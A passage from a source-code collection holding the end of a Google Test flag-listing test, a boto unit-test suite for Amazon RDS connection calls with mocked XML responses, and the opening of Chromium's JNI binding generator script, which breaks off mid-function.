EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_')
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests
EXPECTED_OUTPUT_NO_FILTER = """FooDeathTest.
Test1
Foo.
Bar1
Bar2
DISABLED_Bar3
Abc.
Xyz
Def
FooBar.
Baz
FooTest.
Test1
DISABLED_Test2
Test3
"""
# The expected output when running gtest_list_tests_unittest_ with
# --gtest_list_tests and --gtest_filter=Foo*.
EXPECTED_OUTPUT_FILTER_FOO = """FooDeathTest.
Test1
Foo.
Bar1
Bar2
DISABLED_Bar3
FooBar.
Baz
FooTest.
Test1
DISABLED_Test2
Test3
"""
# Utilities.
def Run(args):
"""Runs gtest_list_tests_unittest_ and returns the list of tests printed."""
return gtest_test_utils.Subprocess([EXE_PATH] + args,
capture_stderr=False).output
# The unit test.
class GTestListTestsUnitTest(gtest_test_utils.TestCase):
"""Tests using the --gtest_list_tests flag to list all tests."""
def RunAndVerify(self, flag_value, expected_output, other_flag):
"""Runs gtest_list_tests_unittest_ and verifies that it prints
the correct tests.
Args:
flag_value: value of the --gtest_list_tests flag;
None if the flag should not be present.
expected_output: the expected output after running the command;
other_flag: a different flag to be passed to command
along with gtest_list_tests;
None if the flag should not be present.
"""
if flag_value is None:
flag = ''
flag_expression = 'not set'
elif flag_value == '0':
flag = '--%s=0' % LIST_TESTS_FLAG
flag_expression = '0'
else:
flag = '--%s' % LIST_TESTS_FLAG
flag_expression = '1'
args = [flag]
if other_flag is not None:
args += [other_flag]
output = Run(args)
msg = ('when %s is %s, the output of "%s" is "%s".' %
(LIST_TESTS_FLAG, flag_expression, ' '.join(args), output))
if expected_output is not None:
self.assert_(output == expected_output, msg)
else:
self.assert_(output != EXPECTED_OUTPUT_NO_FILTER, msg)
def testDefaultBehavior(self):
"""Tests the behavior of the default mode."""
self.RunAndVerify(flag_value=None,
expected_output=None,
other_flag=None)
def testFlag(self):
"""Tests using the --gtest_list_tests flag."""
self.RunAndVerify(flag_value='0',
expected_output=None,
other_flag=None)
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_NO_FILTER,
other_flag=None)
def testOverrideNonFilterFlags(self):
"""Tests that --gtest_list_tests overrides the non-filter flags."""
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_NO_FILTER,
other_flag='--gtest_break_on_failure')
def testWithFilterFlags(self):
"""Tests that --gtest_list_tests takes into account the
--gtest_filter flag."""
self.RunAndVerify(flag_value='1',
expected_output=EXPECTED_OUTPUT_FILTER_FOO,
other_flag='--gtest_filter=Foo*')
if __name__ == '__main__':
gtest_test_utils.Main()
| gpl-3.0 |
IsCoolEntertainment/debpkg_python-boto | tests/unit/rds/test_connection.py | 1 | 30456 | #!/usr/bin/env python
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from tests.unit import unittest
from tests.unit import AWSMockServiceTestCase
from boto.ec2.securitygroup import SecurityGroup
from boto.rds import RDSConnection
from boto.rds.vpcsecuritygroupmembership import VPCSecurityGroupMembership
from boto.rds.parametergroup import ParameterGroup
from boto.rds.logfile import LogFile
class TestRDSConnection(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSConnection, self).setUp()
def default_body(self):
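# Canned DescribeDBInstances XML returned in place of a real RDS response.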
return """
<DescribeDBInstancesResponse>
<DescribeDBInstancesResult>
<DBInstances>
<DBInstance>
<Iops>2000</Iops>
<BackupRetentionPeriod>1</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<DBInstanceStatus>backing-up</DBInstanceStatus>
<DBInstanceIdentifier>mydbinstance2</DBInstanceIdentifier>
<PreferredBackupWindow>10:30-11:00</PreferredBackupWindow>
<PreferredMaintenanceWindow>wed:06:30-wed:07:00</PreferredMaintenanceWindow>
<OptionGroupMembership>
<OptionGroupName>default:mysql-5-5</OptionGroupName>
<Status>in-sync</Status>
</OptionGroupMembership>
<AvailabilityZone>us-west-2b</AvailabilityZone>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues/>
<LicenseModel>general-public-license</LicenseModel>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.5</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<Endpoint>
<Port>3306</Port>
<Address>mydbinstance2.c0hjqouvn9mf.us-west-2.rds.amazonaws.com</Address>
</Endpoint>
<EngineVersion>5.5.27</EngineVersion>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<VpcSecurityGroups>
<VpcSecurityGroupMembership>
<VpcSecurityGroupId>sg-1</VpcSecurityGroupId>
<Status>active</Status>
</VpcSecurityGroupMembership>
</VpcSecurityGroups>
<DBName>mydb2</DBName>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<InstanceCreateTime>2012-10-03T22:01:51.047Z</InstanceCreateTime>
<AllocatedStorage>200</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>awsuser</MasterUsername>
<StatusInfos>
<DBInstanceStatusInfo>
<Message></Message>
<Normal>true</Normal>
<Status>replicating</Status>
<StatusType>read replication</StatusType>
</DBInstanceStatusInfo>
</StatusInfos>
<DBSubnetGroup>
<VpcId>990524496922</VpcId>
<SubnetGroupStatus>Complete</SubnetGroupStatus>
<DBSubnetGroupDescription>My modified DBSubnetGroup</DBSubnetGroupDescription>
<DBSubnetGroupName>mydbsubnetgroup</DBSubnetGroupName>
<Subnets>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7c5b4115</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1c</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7b5b4112</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1b</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-3ea6bd57</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1d</Name>
</SubnetAvailabilityZone>
</Subnet>
</Subnets>
</DBSubnetGroup>
</DBInstance>
</DBInstances>
</DescribeDBInstancesResult>
</DescribeDBInstancesResponse>
"""
def test_get_all_db_instances(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_dbinstances('instance_id')
self.assertEqual(len(response), 1)
self.assert_request_parameters({
'Action': 'DescribeDBInstances',
'DBInstanceIdentifier': 'instance_id',
}, ignore_params_values=['Version'])
db = response[0]
self.assertEqual(db.id, 'mydbinstance2')
self.assertEqual(db.create_time, '2012-10-03T22:01:51.047Z')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'backing-up')
self.assertEqual(db.allocated_storage, 200)
self.assertEqual(
db.endpoint,
(u'mydbinstance2.c0hjqouvn9mf.us-west-2.rds.amazonaws.com', 3306))
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'awsuser')
self.assertEqual(db.availability_zone, 'us-west-2b')
self.assertEqual(db.backup_retention_period, 1)
self.assertEqual(db.preferred_backup_window, '10:30-11:00')
self.assertEqual(db.preferred_maintenance_window,
'wed:06:30-wed:07:00')
self.assertEqual(db.latest_restorable_time, None)
self.assertEqual(db.multi_az, False)
self.assertEqual(db.iops, 2000)
self.assertEqual(db.pending_modified_values, {})
self.assertEqual(db.parameter_group.name,
'default.mysql5.5')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
self.assertEqual(db.security_group.owner_id, None)
self.assertEqual(db.security_group.name, 'default')
self.assertEqual(db.security_group.description, None)
self.assertEqual(db.security_group.ec2_groups, [])
self.assertEqual(db.security_group.ip_ranges, [])
self.assertEqual(len(db.status_infos), 1)
self.assertEqual(db.status_infos[0].message, '')
self.assertEqual(db.status_infos[0].normal, True)
self.assertEqual(db.status_infos[0].status, 'replicating')
self.assertEqual(db.status_infos[0].status_type, 'read replication')
self.assertEqual(db.vpc_security_groups[0].status, 'active')
self.assertEqual(db.vpc_security_groups[0].vpc_group, 'sg-1')
self.assertEqual(db.license_model, 'general-public-license')
self.assertEqual(db.engine_version, '5.5.27')
self.assertEqual(db.auto_minor_version_upgrade, True)
self.assertEqual(db.subnet_group.name, 'mydbsubnetgroup')
class TestRDSCreateDBInstance(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
        super(TestRDSCreateDBInstance, self).setUp()
def default_body(self):
return """
<CreateDBInstanceResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<CreateDBInstanceResult>
<DBInstance>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues>
<MasterUserPassword>****</MasterUserPassword>
</PendingModifiedValues>
<BackupRetentionPeriod>0</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<LicenseModel>general-public-license</LicenseModel>
<DBSubnetGroup>
<VpcId>990524496922</VpcId>
<SubnetGroupStatus>Complete</SubnetGroupStatus>
<DBSubnetGroupDescription>description</DBSubnetGroupDescription>
<DBSubnetGroupName>subnet_grp1</DBSubnetGroupName>
<Subnets>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7c5b4115</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1c</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-7b5b4112</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1b</Name>
</SubnetAvailabilityZone>
</Subnet>
<Subnet>
<SubnetStatus>Active</SubnetStatus>
<SubnetIdentifier>subnet-3ea6bd57</SubnetIdentifier>
<SubnetAvailabilityZone>
<Name>us-east-1d</Name>
</SubnetAvailabilityZone>
</Subnet>
</Subnets>
</DBSubnetGroup>
<DBInstanceStatus>creating</DBInstanceStatus>
<EngineVersion>5.1.50</EngineVersion>
<DBInstanceIdentifier>simcoprod01</DBInstanceIdentifier>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.1</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<PreferredBackupWindow>00:00-00:30</PreferredBackupWindow>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<PreferredMaintenanceWindow>sat:07:30-sat:08:00</PreferredMaintenanceWindow>
<AllocatedStorage>10</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>master</MasterUsername>
</DBInstance>
</CreateDBInstanceResult>
<ResponseMetadata>
<RequestId>2e5d4270-8501-11e0-bd9b-a7b1ece36d51</RequestId>
</ResponseMetadata>
</CreateDBInstanceResponse>
"""
def test_create_db_instance_param_group_name(self):
self.set_http_response(status_code=200)
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
backup_retention_period=0)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'BackupRetentionPeriod': 0,
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'simcoprod01')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.pending_modified_values,
{'MasterUserPassword': '****'})
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
self.assertEqual(db.backup_retention_period, 0)
def test_create_db_instance_param_group_instance(self):
self.set_http_response(status_code=200)
param_group = ParameterGroup()
param_group.name = 'default.mysql5.1'
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group=param_group,
db_subnet_group_name='dbSubnetgroup01')
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'simcoprod01')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.pending_modified_values,
{'MasterUserPassword': '****'})
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
class TestRDSConnectionRestoreDBInstanceFromPointInTime(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSConnectionRestoreDBInstanceFromPointInTime, self).setUp()
def default_body(self):
return """
<RestoreDBInstanceToPointInTimeResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<RestoreDBInstanceToPointInTimeResult>
<DBInstance>
<ReadReplicaDBInstanceIdentifiers/>
<Engine>mysql</Engine>
<PendingModifiedValues/>
<BackupRetentionPeriod>1</BackupRetentionPeriod>
<MultiAZ>false</MultiAZ>
<LicenseModel>general-public-license</LicenseModel>
<DBInstanceStatus>creating</DBInstanceStatus>
<EngineVersion>5.1.50</EngineVersion>
<DBInstanceIdentifier>restored-db</DBInstanceIdentifier>
<DBParameterGroups>
<DBParameterGroup>
<ParameterApplyStatus>in-sync</ParameterApplyStatus>
<DBParameterGroupName>default.mysql5.1</DBParameterGroupName>
</DBParameterGroup>
</DBParameterGroups>
<DBSecurityGroups>
<DBSecurityGroup>
<Status>active</Status>
<DBSecurityGroupName>default</DBSecurityGroupName>
</DBSecurityGroup>
</DBSecurityGroups>
<PreferredBackupWindow>00:00-00:30</PreferredBackupWindow>
<AutoMinorVersionUpgrade>true</AutoMinorVersionUpgrade>
<PreferredMaintenanceWindow>sat:07:30-sat:08:00</PreferredMaintenanceWindow>
<AllocatedStorage>10</AllocatedStorage>
<DBInstanceClass>db.m1.large</DBInstanceClass>
<MasterUsername>master</MasterUsername>
</DBInstance>
</RestoreDBInstanceToPointInTimeResult>
<ResponseMetadata>
<RequestId>1ef546bc-850b-11e0-90aa-eb648410240d</RequestId>
</ResponseMetadata>
</RestoreDBInstanceToPointInTimeResponse>
"""
def test_restore_dbinstance_from_point_in_time(self):
self.set_http_response(status_code=200)
db = self.service_connection.restore_dbinstance_from_point_in_time(
'simcoprod01',
'restored-db',
True)
self.assert_request_parameters({
'Action': 'RestoreDBInstanceToPointInTime',
'SourceDBInstanceIdentifier': 'simcoprod01',
'TargetDBInstanceIdentifier': 'restored-db',
'UseLatestRestorableTime': 'true',
}, ignore_params_values=['Version'])
self.assertEqual(db.id, 'restored-db')
self.assertEqual(db.engine, 'mysql')
self.assertEqual(db.status, 'creating')
self.assertEqual(db.allocated_storage, 10)
self.assertEqual(db.instance_class, 'db.m1.large')
self.assertEqual(db.master_username, 'master')
self.assertEqual(db.multi_az, False)
self.assertEqual(db.parameter_group.name,
'default.mysql5.1')
self.assertEqual(db.parameter_group.description, None)
self.assertEqual(db.parameter_group.engine, None)
def test_restore_dbinstance_from_point_in_time__db_subnet_group_name(self):
self.set_http_response(status_code=200)
db = self.service_connection.restore_dbinstance_from_point_in_time(
'simcoprod01',
'restored-db',
True,
db_subnet_group_name='dbsubnetgroup')
self.assert_request_parameters({
'Action': 'RestoreDBInstanceToPointInTime',
'SourceDBInstanceIdentifier': 'simcoprod01',
'TargetDBInstanceIdentifier': 'restored-db',
'UseLatestRestorableTime': 'true',
'DBSubnetGroupName': 'dbsubnetgroup',
}, ignore_params_values=['Version'])
def test_create_db_instance_vpc_sg_str(self):
self.set_http_response(status_code=200)
vpc_security_groups = [
VPCSecurityGroupMembership(self.service_connection, 'active', 'sg-1'),
VPCSecurityGroupMembership(self.service_connection, None, 'sg-2')]
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
vpc_security_groups=vpc_security_groups)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
'VpcSecurityGroupIds.member.1': 'sg-1',
'VpcSecurityGroupIds.member.2': 'sg-2'
}, ignore_params_values=['Version'])
def test_create_db_instance_vpc_sg_obj(self):
self.set_http_response(status_code=200)
sg1 = SecurityGroup(name='sg-1')
sg2 = SecurityGroup(name='sg-2')
vpc_security_groups = [
VPCSecurityGroupMembership(self.service_connection, 'active', sg1.name),
VPCSecurityGroupMembership(self.service_connection, None, sg2.name)]
db = self.service_connection.create_dbinstance(
'SimCoProd01',
10,
'db.m1.large',
'master',
'Password01',
param_group='default.mysql5.1',
db_subnet_group_name='dbSubnetgroup01',
vpc_security_groups=vpc_security_groups)
self.assert_request_parameters({
'Action': 'CreateDBInstance',
'AllocatedStorage': 10,
'AutoMinorVersionUpgrade': 'true',
'DBInstanceClass': 'db.m1.large',
'DBInstanceIdentifier': 'SimCoProd01',
'DBParameterGroupName': 'default.mysql5.1',
'DBSubnetGroupName': 'dbSubnetgroup01',
'Engine': 'MySQL5.1',
'MasterUsername': 'master',
'MasterUserPassword': 'Password01',
'Port': 3306,
'VpcSecurityGroupIds.member.1': 'sg-1',
'VpcSecurityGroupIds.member.2': 'sg-2'
}, ignore_params_values=['Version'])
class TestRDSOptionGroups(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSOptionGroups, self).setUp()
def default_body(self):
return """
<DescribeOptionGroupsResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<DescribeOptionGroupsResult>
<OptionGroupsList>
<OptionGroup>
<MajorEngineVersion>11.2</MajorEngineVersion>
<OptionGroupName>myoptiongroup</OptionGroupName>
<EngineName>oracle-se1</EngineName>
<OptionGroupDescription>Test option group</OptionGroupDescription>
<Options/>
</OptionGroup>
<OptionGroup>
<MajorEngineVersion>11.2</MajorEngineVersion>
<OptionGroupName>default:oracle-se1-11-2</OptionGroupName>
<EngineName>oracle-se1</EngineName>
<OptionGroupDescription>Default Option Group.</OptionGroupDescription>
<Options/>
</OptionGroup>
</OptionGroupsList>
</DescribeOptionGroupsResult>
<ResponseMetadata>
<RequestId>e4b234d9-84d5-11e1-87a6-71059839a52b</RequestId>
</ResponseMetadata>
</DescribeOptionGroupsResponse>
"""
def test_describe_option_groups(self):
self.set_http_response(status_code=200)
response = self.service_connection.describe_option_groups()
self.assertEqual(len(response), 2)
options = response[0]
self.assertEqual(options.name, 'myoptiongroup')
self.assertEqual(options.description, 'Test option group')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
options = response[1]
self.assertEqual(options.name, 'default:oracle-se1-11-2')
self.assertEqual(options.description, 'Default Option Group.')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
class TestRDSLogFile(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSLogFile, self).setUp()
def default_body(self):
return """
<DescribeDBLogFilesResponse xmlns="http://rds.amazonaws.com/doc/2013-02-12/">
<DescribeDBLogFilesResult>
<DescribeDBLogFiles>
<DescribeDBLogFilesDetails>
<LastWritten>1364403600000</LastWritten>
<LogFileName>error/mysql-error-running.log</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364338800000</LastWritten>
<LogFileName>error/mysql-error-running.log.0</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364342400000</LastWritten>
<LogFileName>error/mysql-error-running.log.1</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364346000000</LastWritten>
<LogFileName>error/mysql-error-running.log.2</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364349600000</LastWritten>
<LogFileName>error/mysql-error-running.log.3</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364405700000</LastWritten>
<LogFileName>error/mysql-error.log</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
</DescribeDBLogFiles>
</DescribeDBLogFilesResult>
<ResponseMetadata>
<RequestId>d70fb3b3-9704-11e2-a0db-871552e0ef19</RequestId>
</ResponseMetadata>
</DescribeDBLogFilesResponse>
"""
def test_get_all_logs(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_logs()
self.assert_request_parameters({
'Action': 'DescribeDBLogFiles',
'MaxRecords': 26,
}, ignore_params_values=['Version'])
self.assertEqual(len(response), 6)
self.assertTrue(isinstance(response[0], LogFile))
self.assertEqual(response[0].log_filename, 'error/mysql-error-running.log')
self.assertEqual(response[0].last_written, '1364403600000')
self.assertEqual(response[0].size, '0')
def test_get_all_logs_single(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_logs('db_instance_1')
self.assert_request_parameters({
'Action': 'DescribeDBLogFiles',
'DBInstanceIdentifier': 'db_instance_1',
'MaxRecords': 26,
}, ignore_params_values=['Version'])
self.assertEqual(len(response), 6)
self.assertTrue(isinstance(response[0], LogFile))
self.assertEqual(response[0].log_filename, 'error/mysql-error-running.log')
self.assertEqual(response[0].last_written, '1364403600000')
self.assertEqual(response[0].size, '0')
class TestRDSOptionGroupOptions(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSOptionGroupOptions, self).setUp()
def default_body(self):
return """
<DescribeOptionGroupOptionsResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<DescribeOptionGroupOptionsResult>
<OptionGroupOptions>
<OptionGroupOption>
<MajorEngineVersion>11.2</MajorEngineVersion>
<PortRequired>true</PortRequired>
<OptionsDependedOn/>
<Description>Oracle Enterprise Manager</Description>
<DefaultPort>1158</DefaultPort>
<Name>OEM</Name>
<EngineName>oracle-se1</EngineName>
<MinimumRequiredMinorEngineVersion>0.2.v3</MinimumRequiredMinorEngineVersion>
<Persistent>false</Persistent>
<Permanent>false</Permanent>
</OptionGroupOption>
</OptionGroupOptions>
</DescribeOptionGroupOptionsResult>
<ResponseMetadata>
<RequestId>d9c8f6a1-84c7-11e1-a264-0b23c28bc344</RequestId>
</ResponseMetadata>
</DescribeOptionGroupOptionsResponse>
"""
def test_describe_option_group_options(self):
self.set_http_response(status_code=200)
response = self.service_connection.describe_option_group_options()
self.assertEqual(len(response), 1)
options = response[0]
self.assertEqual(options.name, 'OEM')
self.assertEqual(options.description, 'Oracle Enterprise Manager')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
self.assertEqual(options.min_minor_engine_version, '0.2.v3')
self.assertEqual(options.port_required, True)
self.assertEqual(options.default_port, 1158)
self.assertEqual(options.permanent, False)
self.assertEqual(options.persistent, False)
self.assertEqual(options.depends_on, [])
if __name__ == '__main__':
unittest.main()
| mit |
ShinyROM/android_external_chromium_org | base/android/jni_generator/jni_generator.py | 15 | 40336 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Extracts native methods from a Java file and generates the JNI bindings.
If you change this, please run and update the tests."""
import collections
import errno
import optparse
import os
import re
import string
from string import Template
import subprocess
import sys
import textwrap
import zipfile
class ParseError(Exception):
"""Exception thrown when we can't parse the input file."""
def __init__(self, description, *context_lines):
Exception.__init__(self)
self.description = description
self.context_lines = context_lines
def __str__(self):
context = '\n'.join(self.context_lines)
return '***\nERROR: %s\n\n%s\n***' % (self.description, context)
class Param(object):
"""Describes a param for a method, either java or native."""
def __init__(self, **kwargs):
self.datatype = kwargs['datatype']
self.name = kwargs['name']
class NativeMethod(object):
"""Describes a C/C++ method that is called by Java code"""
def __init__(self, **kwargs):
self.static = kwargs['static']
self.java_class_name = kwargs['java_class_name']
self.return_type = kwargs['return_type']
self.name = kwargs['name']
self.params = kwargs['params']
if self.params:
assert type(self.params) is list
assert type(self.params[0]) is Param
if (self.params and
self.params[0].datatype == kwargs.get('ptr_type', 'int') and
self.params[0].name.startswith('native')):
self.type = 'method'
self.p0_type = self.params[0].name[len('native'):]
if kwargs.get('native_class_name'):
self.p0_type = kwargs['native_class_name']
else:
self.type = 'function'
self.method_id_var_name = kwargs.get('method_id_var_name', None)
class CalledByNative(object):
"""Describes a java method exported to c/c++"""
def __init__(self, **kwargs):
self.system_class = kwargs['system_class']
self.unchecked = kwargs['unchecked']
self.static = kwargs['static']
self.java_class_name = kwargs['java_class_name']
self.return_type = kwargs['return_type']
self.name = kwargs['name']
self.params = kwargs['params']
self.method_id_var_name = kwargs.get('method_id_var_name', None)
self.signature = kwargs.get('signature')
self.is_constructor = kwargs.get('is_constructor', False)
self.env_call = GetEnvCall(self.is_constructor, self.static,
self.return_type)
self.static_cast = GetStaticCastForReturnType(self.return_type)
def JavaDataTypeToC(java_type):
"""Returns a C datatype for the given java type."""
java_pod_type_map = {
'int': 'jint',
'byte': 'jbyte',
'char': 'jchar',
'short': 'jshort',
'boolean': 'jboolean',
'long': 'jlong',
'double': 'jdouble',
'float': 'jfloat',
}
java_type_map = {
'void': 'void',
'String': 'jstring',
'java/lang/String': 'jstring',
'Class': 'jclass',
'java/lang/Class': 'jclass',
}
if java_type in java_pod_type_map:
return java_pod_type_map[java_type]
elif java_type in java_type_map:
return java_type_map[java_type]
elif java_type.endswith('[]'):
if java_type[:-2] in java_pod_type_map:
return java_pod_type_map[java_type[:-2]] + 'Array'
return 'jobjectArray'
else:
return 'jobject'
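# Illustrative mappings produced by JavaDataTypeToC, derived from the tables
# above (any other reference type falls through to 'jobject'):
#   'int'      -> 'jint'
#   'String'   -> 'jstring'
#   'int[]'    -> 'jintArray'
#   'String[]' -> 'jobjectArray'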
class JniParams(object):
_imports = []
_fully_qualified_class = ''
_package = ''
_inner_classes = []
_remappings = []
@staticmethod
def SetFullyQualifiedClass(fully_qualified_class):
JniParams._fully_qualified_class = 'L' + fully_qualified_class
JniParams._package = '/'.join(fully_qualified_class.split('/')[:-1])
@staticmethod
def ExtractImportsAndInnerClasses(contents):
contents = contents.replace('\n', '')
re_import = re.compile(r'import.*?(?P<class>\S*?);')
for match in re.finditer(re_import, contents):
JniParams._imports += ['L' + match.group('class').replace('.', '/')]
re_inner = re.compile(r'(class|interface)\s+?(?P<name>\w+?)\W')
for match in re.finditer(re_inner, contents):
inner = match.group('name')
if not JniParams._fully_qualified_class.endswith(inner):
JniParams._inner_classes += [JniParams._fully_qualified_class + '$' +
inner]
@staticmethod
def ParseJavaPSignature(signature_line):
prefix = 'Signature: '
return '"%s"' % signature_line[signature_line.index(prefix) + len(prefix):]
@staticmethod
def JavaToJni(param):
"""Converts a java param into a JNI signature type."""
pod_param_map = {
'int': 'I',
'boolean': 'Z',
'char': 'C',
'short': 'S',
'long': 'J',
'double': 'D',
'float': 'F',
'byte': 'B',
'void': 'V',
}
object_param_list = [
'Ljava/lang/Boolean',
'Ljava/lang/Integer',
'Ljava/lang/Long',
'Ljava/lang/Object',
'Ljava/lang/String',
'Ljava/lang/Class',
]
prefix = ''
# Array?
